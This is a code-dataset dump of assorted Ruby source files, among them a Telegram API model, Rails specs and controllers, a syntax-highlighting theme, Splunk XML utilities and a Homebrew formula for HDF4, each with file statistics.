hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1aa192bfe3723d1fb06499931bb9d3aa8f00a0bd | 8,455 | =begin
#Telegram bot API
#This is a swagger defenition for [Telegram bot API](https://core.telegram.org/bots/api).
OpenAPI spec version: 3.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'date'
module Teleswagger
class InlineQueryResultArticle
attr_accessor :type
attr_accessor :id
attr_accessor :title
attr_accessor :input_message_content
attr_accessor :reply_markup
attr_accessor :url
attr_accessor :hide_url
attr_accessor :description
attr_accessor :thumb_url
attr_accessor :thumb_width
attr_accessor :thumb_height
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'type' => :'type',
:'id' => :'id',
:'title' => :'title',
:'input_message_content' => :'input_message_content',
:'reply_markup' => :'reply_markup',
:'url' => :'url',
:'hide_url' => :'hide_url',
:'description' => :'description',
:'thumb_url' => :'thumb_url',
:'thumb_width' => :'thumb_width',
:'thumb_height' => :'thumb_height'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'type' => :'InlineType',
:'id' => :'String',
:'title' => :'String',
:'input_message_content' => :'Object',
:'reply_markup' => :'InlineKeyboardMarkup',
:'url' => :'String',
:'hide_url' => :'BOOLEAN',
:'description' => :'String',
:'thumb_url' => :'String',
:'thumb_width' => :'Integer',
:'thumb_height' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'type')
self.type = attributes[:'type']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'title')
self.title = attributes[:'title']
end
if attributes.has_key?(:'input_message_content')
self.input_message_content = attributes[:'input_message_content']
end
if attributes.has_key?(:'reply_markup')
self.reply_markup = attributes[:'reply_markup']
end
if attributes.has_key?(:'url')
self.url = attributes[:'url']
end
if attributes.has_key?(:'hide_url')
self.hide_url = attributes[:'hide_url']
end
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'thumb_url')
self.thumb_url = attributes[:'thumb_url']
end
if attributes.has_key?(:'thumb_width')
self.thumb_width = attributes[:'thumb_width']
end
if attributes.has_key?(:'thumb_height')
self.thumb_height = attributes[:'thumb_height']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properies with the reasons
def list_invalid_properties
invalid_properties = Array.new
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @type.nil?
return false if @id.nil?
return false if @title.nil?
return false if @input_message_content.nil?
return true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
type == o.type &&
id == o.id &&
title == o.title &&
input_message_content == o.input_message_content &&
reply_markup == o.reply_markup &&
url == o.url &&
hide_url == o.hide_url &&
description == o.description &&
thumb_url == o.thumb_url &&
thumb_width == o.thumb_width &&
thumb_height == o.thumb_height
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[type, id, title, input_message_content, reply_markup, url, hide_url, description, thumb_url, thumb_width, thumb_height].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /^(true|t|yes|y|1)$/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = Teleswagger.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 28.758503 | 131 | 0.615967 |
284c7e2a962c40fe6c300b5e08a9b5493fe15f35 | 341 | class CreateComics < ActiveRecord::Migration[6.1]
def change
create_table :comics do |t|
t.string :full_path, null: false
t.integer :size
t.integer :issue_number
t.integer :pub_year
t.integer :pub_month
t.string :extension
t.integer :title_id
t.timestamps null: false
end
end
end
| 21.3125 | 49 | 0.648094 |
b93967a8b3727cd12660a84d5cb4029b330b8c75 | 1,301 | describe TodoBot::Tasks::FinishTaskService do
let(:service) { described_class.new(args) }
let(:args) { {user: user, chat: chat, number: number} }
let(:user) { create(:user) }
let(:number) { 1 }
describe '#execute' do
subject { service.execute }
context 'when chat doesn`t contain list' do
let(:chat) { create(:chat) }
it { is_expected.to eq I18n.t('list.not_exists') }
end
context 'when chat contains list' do
let(:chat) { create(:chat, :with_list) }
let(:list) { chat.lists.first }
context 'when list doesn`t contain tasks' do
it { is_expected.to eq I18n.t('task.not_found') }
end
context 'when list contains tasks' do
before do
list.tasks.create(name: '1', user: user)
list.tasks.create(name: '2', user: user)
end
context 'when number of finished task out of tasks range' do
let(:number) { 3 }
it { is_expected.to eq I18n.t('task.not_found') }
end
context 'when number of finishing task in tasks range' do
let(:tasks) { TodoBot::CollectionToMessagePresenter.new(list.tasks.uncompleted).execute }
it { is_expected.to eq "#{I18n.t('task.finished', task: '1')}\n\n#{tasks}" }
end
end
end
end
end
| 28.911111 | 99 | 0.601845 |
3300414479c1bc360684690fff2bbb1cc6f6b46f | 361 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::SQL::Mgmt::V2014_04_01
module Models
#
# Defines values for GeoBackupPolicyState
#
module GeoBackupPolicyState
Disabled = "Disabled"
Enabled = "Enabled"
end
end
end
| 22.5625 | 70 | 0.706371 |
1c336d99267150f9e7beb6934abd60522d74648a | 2,704 | class SlotsStep
include MemoryModel
attribute :processor, :steps_processor
attribute :review_slot, :string
attribute :currently_filling, :string
attribute :skip_remaining_slots, :boolean
attribute :option_0, :string
attribute :option_1, :string
attribute :option_2, :string
before_validation :reorder_options
validates_each :option_0, :option_1, :option_2,
allow_blank: true do |record, attr, value|
begin
slot = ConcreteSlot.parse(value) # rescue ArgumentError false
rescue ArgumentError
record.errors.add(attr, 'is not a parseable slot')
end
if slot && !record.slot_constraints.bookable_slot?(slot)
record.errors.add(attr, 'is not a bookable slot')
end
end
validates :option_0, presence: true
delegate :bookable_slots?, :unavailability_reasons, to: :slot_constraints
def reorder_options
if option_0.present? && option_1.blank? && option_2.present?
self.option_1 = option_2
self.option_2 = nil
end
end
def skip_remaining_slots?
errors.empty? && skip_remaining_slots == true
end
def options_available?
if skip_remaining_slots? || just_reviewed_slot? ||
currently_filling_slot_left_blank? || !available_bookable_slots?
false
else
next_slot_to_fill ? true : false
end
end
def just_reviewed_slot?
review_slot.present? && currently_filling.present? &&
review_slot == currently_filling
end
def currently_filling_slot_left_blank?
currently_filling.present? && send("option_#{currently_filling}").blank?
end
def slots
options.map { |s| ConcreteSlot.parse(s) }
end
def valid_options
%i[option_0 option_1 option_2].
reject { |o| errors.key?(o) }.
map { |o| send(o) }.
reject(&:blank?).
map { |o| ConcreteSlot.parse(o) }
end
def options
[option_0, option_1, option_2].select(&:present?)
end
def slot_constraints
@slot_constraints ||= processor.booking_constraints.on_slots
end
def next_slot_to_fill
return '0' if unbookable_slots_selected?
return review_slot if review_slot.present?
slots_select_count = valid_options.size
return nil if slots_select_count == 3
slots_select_count.to_s
end
def available_bookable_slots?
return true if option_0.blank?
slot_constraints.
bookable_slots.
map { |cs| cs.slot.iso8601 }.
reject { |s| s.in?(options) }.
any?
end
def unable_to_add_more_slots?
!skip_remaining_slots && !available_bookable_slots?
end
def unbookable_slots_selected?
options.map { |o| ConcreteSlot.parse(o) }.any? do |slot|
!slot_constraints.bookable_slot?(slot)
end
end
end
| 24.36036 | 76 | 0.698964 |
912cf4ef0f9d0ecdaf546f1bcd10327978e7250b | 732 | Pod::Spec.new do |spec|
spec.name = "ValidationNEL"
spec.version = "0.2.0"
spec.summary = "A Swift implementation of ValidationNEL: accumulating more than one failure."
spec.homepage = "https://github.com/Hxucaa/ValidationNEL"
spec.license = { type: 'MIT', file: 'LICENSE' }
spec.authors = { "Lance Zhu" => '[email protected]' }
spec.ios.deployment_target = "8.0"
spec.osx.deployment_target = "10.9"
spec.tvos.deployment_target = "9.1"
spec.watchos.deployment_target = "2.1"
spec.requires_arc = true
spec.source = { git: "https://github.com/Hxucaa/ValidationNEL.git", tag: "v#{spec.version}", submodules: true }
spec.source_files = "Sources/**/*.{h,swift}"
spec.dependency "Swiftz", "~> 0.5.0"
end
| 36.6 | 113 | 0.684426 |
acf83c3a5a767abfbc10d671d20d56dfc2929be7 | 191 | # frozen_string_literal: true
require "zeitwerk"
module DevOrbit
loader = Zeitwerk::Loader.new
loader.tag = File.basename(__FILE__, ".rb")
loader.push_dir(__dir__)
loader.setup
end
| 17.363636 | 45 | 0.748691 |
bb70a609d197a02f21d802c8a97e0f6680626fae | 3,370 | # -*- coding: utf-8 -*- #
# frozen_string_literal: true
module Rouge
module Themes
# A port of the pastie style from Pygments.
# See https://bitbucket.org/birkenfeld/pygments-main/src/default/pygments/styles/pastie.py
class Pastie < CSSTheme
name 'pastie'
style Comment, :fg => '#888888'
style Comment::Preproc, :fg => '#cc0000', :bold => true
style Comment::Special, :fg => '#cc0000', :bg => '#fff0f0', :bold => true
style Error, :fg => '#a61717', :bg => '#e3d2d2'
style Generic::Error, :fg => '#aa0000'
style Generic::Heading, :fg => '#333333'
style Generic::Subheading, :fg => '#666666'
style Generic::Deleted, :fg => '#000000', :bg => '#ffdddd'
style Generic::Inserted, :fg => '#000000', :bg => '#ddffdd'
style Generic::Emph, :italic => true
style Generic::Strong, :bold => true
style Generic::Lineno, :fg => '#888888'
style Generic::Output, :fg => '#888888'
style Generic::Prompt, :fg => '#555555'
style Generic::Traceback, :fg => '#aa0000'
style Keyword, :fg => '#008800', :bold => true
style Keyword::Pseudo, :fg => '#008800'
style Keyword::Type, :fg => '#888888', :bold => true
style Num, :fg => '#0000dd', :bold => true
style Str, :fg => '#dd2200', :bg => '#fff0f0'
style Str::Escape, :fg => '#0044dd', :bg => '#fff0f0'
style Str::Interpol, :fg => '#3333bb', :bg => '#fff0f0'
style Str::Other, :fg => '#22bb22', :bg => '#f0fff0'
#style Str::Regex, :fg => '#008800', :bg => '#fff0ff'
# The background color on regex really doesn't look good, so let's drop it
style Str::Regex, :fg => '#008800'
style Str::Symbol, :fg => '#aa6600', :bg => '#fff0f0'
style Name::Attribute, :fg => '#336699'
style Name::Builtin, :fg => '#003388'
style Name::Class, :fg => '#bb0066', :bold => true
style Name::Constant, :fg => '#003366', :bold => true
style Name::Decorator, :fg => '#555555'
style Name::Exception, :fg => '#bb0066', :bold => true
style Name::Function, :fg => '#0066bb', :bold => true
#style Name::Label, :fg => '#336699', :italic => true
# Name::Label is used for built-in CSS properties in Rouge, so let's drop italics
style Name::Label, :fg => '#336699'
style Name::Namespace, :fg => '#bb0066', :bold => true
style Name::Property, :fg => '#336699', :bold => true
style Name::Tag, :fg => '#bb0066', :bold => true
style Name::Variable, :fg => '#336699'
style Name::Variable::Global, :fg => '#dd7700'
style Name::Variable::Instance, :fg => '#3333bb'
style Operator::Word, :fg => '#008800'
style Text, {}
style Text::Whitespace, :fg => '#bbbbbb'
end
end
end
| 47.464789 | 95 | 0.465282 |
4aede30fc45acdd3ab13684e63963a21bb388ee0 | 1,437 | require 'jackal-stacks'
module Jackal
module Stacks
module Formatter
# Format result for slack notification
class Slack < Jackal::Formatter
# Source service
SOURCE = 'stacks'
# Destination service
DESTINATION = 'slack'
NOTIFY_ON = %w(created updated destroyed)
# Format payload
#
# @param payload [Smash]
def format(payload)
if(payload.get(:data, :stacks))
unless((notify = payload.fetch(:data, :stacks, {}).keys & NOTIFY_ON).empty?)
msgs = payload.fetch(:data, :slack, :messages, [])
msgs << Smash.new(
:description => "Stacks result: #{notify.first}",
:message => [
"Stack has been #{notify.first} [name: #{payload.get(:data, :stacks, :name)}]",
"* Template: #{payload.get(:data, :stacks, :template)}",
"* Repository: #{payload.get(:data, :code_fetcher, :info, :owner)}/#{payload.get(:data, :code_fetcher, :info, :name)}",
"* Reference: #{payload.get(:data, :code_fetcher, :info, :reference)}",
"* SHA: #{payload.get(:data, :code_fetcher, :info, :commit_sha)}"
].join("\n"),
:color => :good
)
payload.set(:data, :slack, :messages, msgs)
end
end
end
end
end
end
end
| 32.659091 | 137 | 0.512178 |
d545496b5e919c6d6a44096744f480430a2af7e0 | 418 | class SessionsController < ApplicationController
def new
end
def create
user = User.find_by(email: params[:session][:email].downcase)
if user && user.authenticate(params[:session][:password])
log_in user
redirect_to user
else
flash.now[:danger] = 'Invalid email/password combination'
render 'new'
end
end
def destroy
log_out
redirect_to root_url
end
end
| 19.904762 | 65 | 0.674641 |
037e1a4412ae4d487f9df598256a4e41b933d9b8 | 125 | class RemoveOwnedShowsFromUsers < ActiveRecord::Migration[5.0]
def change
remove_column :users, :owned_shows
end
end
| 20.833333 | 62 | 0.776 |
d5afa91b1619b06435572b5c71489a0fc6b03afc | 119 | class AddToContainerType < ActiveRecord::Migration
def change
add_column :container_types, :label, :string
end
end
| 19.833333 | 50 | 0.798319 |
ab3ce9258ac33188b64aa8812cd8d2fc77c2a968 | 1,708 | # Class represents a lono option that is possibly callable. Examples:
#
# config.allow.envs
# config.allow.regions
# config.deny.envs
# config.deny.regions
#
# Abstraction is definitely obtuse. Using it to get rid of duplication.
#
class Lono::App
class CallableOption
include Lono::Utils::Logging
def initialize(options={})
@options = options
# Example:
# config_name: config.allow.envs
# config_value: ["dev"]
# args: [@stack_name] # passed to object.call
@config_name = options[:config_name]
@config_value = options[:config_value]
@passed_args = options[:passed_args]
end
# Returns either an Array or nil
def object
case @config_value
when nil
return nil
when Array
return @config_value
when -> (c) { c.respond_to?(:public_instance_methods) && c.public_instance_methods.include?(:call) }
object= @config_value.new
when -> (c) { c.respond_to?(:call) }
object = @config_value
else
raise "Invalid option for #{@config_name}"
end
if object
result = @passed_args.empty? ? object.call : object.call(*@passed_args)
unless result.is_a?(Array) || result.is_a?(NilClass)
message = "ERROR: The #{@config_name} needs to return an Array or nil"
logger.info message.color(:yellow)
logger.info <<~EOL
The #{@config_name} when assigned a class, object, or proc must implement
the call method and return an Array or nil.
The current return value is a #{result.class}
EOL
raise message
end
end
result
end
end
end
| 29.964912 | 106 | 0.618267 |
ac3ae07f3a0ea0c8077e06acd145bd3a378f691b | 51 | require "mkmf"
create_makefile("rubyraw/rubyraw")
| 12.75 | 34 | 0.784314 |
6136903a8d2e39c671aa5cee44a7f80d78c56261 | 1,386 | # encoding: utf-8
# frozen_string_literal: true
require_relative 'keys'
module TTY
class Reader
# Responsible for meta-data information about key pressed
#
# @api private
class Key < Struct.new(:name, :ctrl, :meta, :shift)
def initialize(*)
super(nil, false, false, false)
end
end
# Represents key event emitted during keyboard press
#
# @api public
class KeyEvent < Struct.new(:value, :key)
# Create key event from read input codes
#
# @param [Hash[Symbol]] keys
# the keys and codes mapping
# @param [Array[Integer]] codes
#
# @return [KeyEvent]
#
# @api public
def self.from(keys, char)
key = Key.new
key.name = (name = keys[char]) ? name : :ignore
case char
when proc { |c| c =~ /^[a-z]{1}$/ }
key.name = :alpha
when proc { |c| c =~ /^[A-Z]{1}$/ }
key.name = :alpha
key.shift = true
when proc { |c| c =~ /^\d+$/ }
key.name = :num
when proc { |cs| !Keys.ctrl_keys[cs].nil? }
key.ctrl = true
end
new(char, key)
end
# Check if key event can be triggered
#
# @return [Boolean]
#
# @api public
def trigger?
!key.nil? && !key.name.nil?
end
end # KeyEvent
end # Reader
end # TTY
| 23.1 | 61 | 0.520202 |
91e86aa00515de1f5ada51ab6d03bace99283e10 | 442 | require 'simplecov'
SimpleCov.start do
add_filter '/spec/'
add_group 'Codeception', 'lib/guard'
end
require 'rspec'
require 'guard/codeception'
require 'coveralls'
Coveralls.wear!
RSpec.configure do |config|
config.treat_symbols_as_metadata_keys_with_true_values = true
config.run_all_when_everything_filtered = true
config.order = :random
config.filter_run :focus
end
| 22.1 | 66 | 0.68552 |
87759055abe6335f0cec565733e03cf4fe6880cb | 4,254 | #--
# Copyright 2011-2013 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#++
# :enddoc:
##
# Control which XML parsing library the Splunk SDK for Ruby uses.
#
# The Splunk SDK for Ruby can use either REXML (the default library that
# ships with Ruby 1.9) or Nokogiri (a binding around the C library +libxml2+).
# Which library it tries is determined by the +$defualt_xml_library+ global
# variable.
#
# By default, this module will try to set the library to Nokogiri, and, if
# that is unavailable, will fall back to REXML. The library can be selected
# explicitly (in which case it will not use the fail back behavior) by calling
# +require_xml_library+ (which you should use in preference to setting
# +$default_xml_library+ manually, since it also takes care of checking that
# the library loads properly).
#
# You can also specify the environment variable +$RUBY_XML_LIBRARY+ in the shell
# to choose the default library. The two values are +"rexml"+ and +"nokogiri"+
# (note that they are not case sensitive). If you specify this environment
# variable, the SDK will not attempt to fall back to REXML in the absence of
# Nokogiri.
module Splunk
##
# Tell the Splunk SDK for Ruby to use _library_ for XML parsing.
#
# The only two supported libraries for now are Nokogiri (pass +:nokogiri+ as
# the _library_ parameter) and REXML (pass +:rexml+).
#
# Arguments:
# * _library_: (+:nokogiri+ or +:rexml:+) A symbol specifying the library.
#
# Raises:
# * +LoadError+ if the library requested cannot be loaded.
#
# Returns no value of interest.
#
def self.require_xml_library(library)
if library == :nokogiri
require 'nokogiri'
$splunk_xml_library = :nokogiri
else
require 'rexml/document'
require 'rexml/streamlistener'
$splunk_xml_library = :rexml
end
end
# In the absence of any other call to +require_xml_library+, we try to use
# Nokogiri, and if that doesn't work, we fall back to REXML, which is shipped
# with Ruby 1.9, and should always be there.
begin
require 'nokogiri'
$splunk_xml_library = :nokogiri
rescue LoadError
require 'rexml/document'
require 'rexml/streamlistener'
$splunk_xml_library = :rexml
end
##
# Returns the text contained in the first element matching _xpath_ in _text_.
#
# Arguments:
# * _xpath_: (+String+) An XPath specifier. It should refer to an element
# containing only text, not additional XML elements.
# * _text_: (+String+) The text to search in.
#
# Returns: A +String+ containing the text in the first match of _xpath_,
# or +nil+ if there was no match.
#
# *Examples*:
#
# text_at_xpath("/set/entry", "<set><entry>Boris</entry></set>")
# == "Boris"
# text_at_xpath("/a", "<a>Alpha</a> <a>Beta</a>") == "Alpha"
# text_at_xpath("/a", "<b>Quill pen</b>") == nil
#
def self.text_at_xpath(xpath, text)
if text.nil? or text.length == 0
return nil
elsif $splunk_xml_library == :nokogiri
doc = Nokogiri::XML(text)
matches = doc.xpath(xpath)
if matches.empty?
return nil
else
return matches.last.content
end
else
doc = REXML::Document.new(text)
matches = doc.elements[xpath]
if matches
return matches[0].value
else
return nil
end
end
end
##
# Escape reserved XML entities in a string.
#
# To match the behavior of splunkd, we only escape &, <, and >, not single
# and double quotes. This means we have to write the behavior ourselves,
# since both REXML and Nokogiri also escape both kinds of quotes.
#
def self.escape_string(str)
str.gsub(/&/, "&").gsub(/</, "<").gsub(/>/, ">")
end
end
| 32.976744 | 80 | 0.682652 |
ff468ca7b783ccfbc77c4045514c97d5685499dc | 184 | class CreateItems < ActiveRecord::Migration[5.2]
def change
create_table :items do |t|
t.string :name
t.string :description
t.integer :box_id
end
end
end
| 18.4 | 48 | 0.652174 |
187d95913a3f42da3fde317772f1ebc3f91173ef | 1,417 | require 'test_helper'
class GitTest < Minitest::Test
def test_get_tags_sort_by_date_asc
output = <<-EOF
refs/tags/0.0.1 Thu Aug 4 12:34:56 2011 +0200
refs/tags/1.0.0 Fri Aug 5 11:11:11 2011 +0200
refs/tags/1.0.1 Thu Sep 12 21:10:00 2013 +0200
refs/tags/1.1.0 Thu Dec 10 10:10:10 2015 +0200
refs/tags/2.0.0 Fri Dec 11 12:12:12 2015 +0200
EOF
expected = [
'0.0.1 Thu Aug 4 12:34:56 2011 +0200',
'1.0.0 Fri Aug 5 11:11:11 2011 +0200',
'1.0.1 Thu Sep 12 21:10:00 2013 +0200',
'1.1.0 Thu Dec 10 10:10:10 2015 +0200',
'2.0.0 Fri Dec 11 12:12:12 2015 +0200'
]
MindTheChanges::Git.expects(:`).with("git for-each-ref --sort=taggerdate --format '%(refname) %(taggerdate)' refs/tags").returns(output).once
assert_equal(expected, MindTheChanges::Git.get_tags_sort_by_date_asc)
end
def test_get_commit_hash
tag = '1.1.0'
output = "1a2b3c0f0f0f0f0f0f0f0f0f0f0f0f0f0f1a2b3c\n"
expected = output.strip
MindTheChanges::Git.expects(:`).with("git rev-list -n 1 #{tag}").returns(output).once
assert_equal(expected, MindTheChanges::Git.get_commit_hash(tag))
end
def test_get_commit_hash_of_head
output = "1a2b3c0f0f0f0f0f0f0f0f0f0f0f0f0f0f1a2b3c\n"
expected = output.strip
MindTheChanges::Git.expects(:`).with("git rev-parse HEAD").returns(output).once
assert_equal(expected, MindTheChanges::Git.get_commit_hash_of_head)
end
end
| 37.289474 | 145 | 0.695131 |
61a8fa9c1bbd4c61e598561fd6400564a3407a0e | 447 | # Be sure to restart your server when you modify this file.
HackerspaceLibrary::Application.config.session_store :cookie_store, key: '_hackerspace-library_session'
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rails generate session_migration")
# HackerspaceLibrary::Application.config.session_store :active_record_store
| 49.666667 | 103 | 0.823266 |
38cdf3065631172a2139a5a09163bde6764db53f | 2,960 | require "rails_helper"
describe "Rate limiting" do
include_context "stub types api"
include_context "stub candidate create access token api"
let(:ip) { "1.2.3.4" }
it_behaves_like "an IP-based rate limited endpoint", "POST /csp_reports", 5, 1.minute do
def perform_request
post csp_reports_path, params: {}.to_json, headers: { "REMOTE_ADDR" => ip }
end
end
it_behaves_like "an IP-based rate limited endpoint", "PATCH /mailinglist/signup/name", 5, 1.minute do
def perform_request
key = MailingList::Steps::Name.model_name.param_key
params = { key => attributes_for(:mailing_list_name) }
patch mailing_list_step_path(:name), params: params, headers: { "REMOTE_ADDR" => ip }
end
end
it_behaves_like "an IP-based rate limited endpoint", "GET */resend_verification", 5, 1.minute do
def perform_request
get resend_verification_mailing_list_steps_path(redirect_path: "redirect/path"), headers: { "REMOTE_ADDR" => ip }
end
end
it_behaves_like "an IP-based rate limited endpoint", "PATCH */mailinglist/signup/privacy_policy", 5, 1.minute do
def perform_request
key = MailingList::Steps::PrivacyPolicy.model_name.param_key
params = { key => attributes_for(:mailing_list_privacy_policy) }
patch mailing_list_step_path(:privacy_policy), params: params, headers: { "REMOTE_ADDR" => ip }
end
end
describe "event endpoint rate limiting" do
let(:readable_event_id) { "123" }
before do
event = build(:event_api, readable_id: readable_event_id)
allow_any_instance_of(GetIntoTeachingApiClient::TeachingEventsApi).to \
receive(:get_teaching_event).and_return event
end
it_behaves_like "an IP-based rate limited endpoint", "PATCH /events/:id/apply/personal_details", 5, 1.minute do
def perform_request
key = Events::Steps::PersonalDetails.model_name.param_key
params = { key => attributes_for(:events_personal_details) }
patch event_step_path(readable_event_id, :personal_details), params: params, headers: { "REMOTE_ADDR" => ip }
end
end
it_behaves_like "an IP-based rate limited endpoint", "PATCH */events/:id/apply/personalised_updates", 5, 1.minute do
def perform_request
key = Events::Steps::PersonalisedUpdates.model_name.param_key
params = { key => attributes_for(:events_personalised_updates) }
patch event_step_path(readable_event_id, :personalised_updates), params: params, headers: { "REMOTE_ADDR" => ip }
end
end
it_behaves_like "an IP-based rate limited endpoint", "PATCH */events/:id/apply/further_details", 5, 1.minute do
def perform_request
key = Events::Steps::FurtherDetails.model_name.param_key
params = { key => attributes_for(:events_further_details) }
patch event_step_path(readable_event_id, :further_details), params: params, headers: { "REMOTE_ADDR" => ip }
end
end
end
end
| 41.111111 | 121 | 0.710473 |
bb199ce1343f3e7c9437181a5b709d7bb63793d5 | 590 | $:<< 'lib'
require 'benchmark'
require 'bloomfilter-rb'
n = 10000
Benchmark.bm do |x|
r = BloomFilter::Redis.new
x.report("insert") do
n.times do
r.insert("a")
end
end
x.report("lookup present") do
n.times do
r.include?("a")
end
end
x.report("lookup missing") do
n.times do
r.include?("b")
end
end
end
# user system total real
# insert 1.000000 0.380000 1.380000 ( 1.942181)
# lookup present 1.030000 0.470000 1.500000 ( 2.577577)
# lookup missing 0.370000 0.160000 0.530000 ( 1.060429) | 17.352941 | 61 | 0.583051 |
e82c93843c78ea5c8deb8a5fa829654d17055896 | 367 | class InvoicesMailer < ActionMailer::Base
default from: Rails.configuration.sender
def send_invoice(invoice_id, to, subject, message, attach_pdf)
@invoice = Invoice.find(invoice_id)
@message = message
attachments["invoice-#{@invoice.code}.pdf"] = File.read(@invoice.invoice_location) if attach_pdf
mail(to: to, subject: subject)
end
end
| 30.583333 | 100 | 0.724796 |
2825dbffe21f370911fd56e0515ba89a2f5ac1a4 | 2,596 | class Hdf4 < Formula
homepage "http://www.hdfgroup.org"
url "http://www.hdfgroup.org/ftp/HDF/releases/HDF4.2.10/src/hdf-4.2.10.tar.bz2"
sha1 "5163543895728dabb536a0659b3d965d55bccf74"
bottle do
root_url "https://homebrew.bintray.com/bottles-versions"
sha1 "c2c52d5a07559d08d3eb5af108ed8b839721ed88" => :yosemite
sha1 "ac39325b98c7baac776f8a28e4fb138a25ea7340" => :mavericks
sha1 "cc499e59d40db001001ef595539e1d79dcf18c96" => :mountain_lion
end
option "with-fortran", "Build Fortran interface."
deprecated_option "enable-fortran" => "with-fortran"
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "szip"
depends_on "jpeg"
depends_on :fortran => :optional
# redefine library name to "df" from "hdf". this seems to be an artifact
# of using cmake that needs to be corrected for compatibility with
# anything depending on hdf4.
patch :DATA
def install
ENV["SZIP_INSTALL"] = HOMEBREW_PREFIX
args = std_cmake_args
args.concat [
"-DBUILD_SHARED_LIBS=ON",
"-DBUILD_TESTING=OFF",
"-DHDF4_BUILD_TOOLS=ON",
"-DHDF4_BUILD_UTILS=ON",
"-DHDF4_BUILD_WITH_INSTALL_NAME=ON",
"-DHDF4_ENABLE_JPEG_LIB_SUPPORT=ON",
"-DHDF4_ENABLE_NETCDF=OFF", # Conflict. Just install NetCDF for this.
"-DHDF4_ENABLE_SZIP_ENCODING=ON",
"-DHDF4_ENABLE_SZIP_SUPPORT=ON",
"-DHDF4_ENABLE_Z_LIB_SUPPORT=ON"
]
if build.with? "fortran"
args.concat %W[-DHDF4_BUILD_FORTRAN=ON -DCMAKE_Fortran_MODULE_DIRECTORY=#{include}]
else
args << "-DHDF4_BUILD_FORTRAN=OFF"
end
mkdir "build" do
system "cmake", "..", *args
system "make", "install"
# Remove stray ncdump executable as it conflicts with NetCDF.
rm (bin+"ncdump")
end
end
def caveats; <<-EOS.undent
HDF4 has been superseeded by HDF5. However, the API changed
substantially and some programs still require the HDF4 libraries in order
to function.
EOS
end
end
__END__
diff --git a/CMakeLists.txt b/CMakeLists.txt
index ba2cf13..27a3df4 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -95,7 +95,7 @@ MARK_AS_ADVANCED (HDF4_NO_PACKAGES)
# Set the core names of all the libraries
